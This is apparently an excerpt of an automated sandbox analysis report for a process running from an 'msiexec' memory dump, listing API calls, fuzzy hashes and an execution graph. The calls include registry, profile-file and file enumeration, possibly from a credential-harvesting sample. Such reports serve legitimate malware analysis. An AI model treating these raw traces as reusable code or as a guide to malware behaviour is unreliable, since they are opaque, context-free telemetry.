                                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                            APIs
                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3669619086-0
                                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                            • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                            • free.MSVCRT ref: 00417425
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2605342592-0
                                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 1961120804-0
                                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.1%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0.5%
                                                                                            Total number of Nodes:762
                                                                                            Total number of Limit Nodes:20
                                                                                            execution_graph 34006 40fc40 70 API calls 34181 403640 21 API calls 34007 427fa4 42 API calls 34182 412e43 _endthreadex 34183 425115 76 API calls __fprintf_l 34184 43fe40 133 API calls 34010 425115 83 API calls __fprintf_l 34011 401445 memcpy memcpy DialogBoxParamA 34012 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 33986->33985 33987->33948 33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls 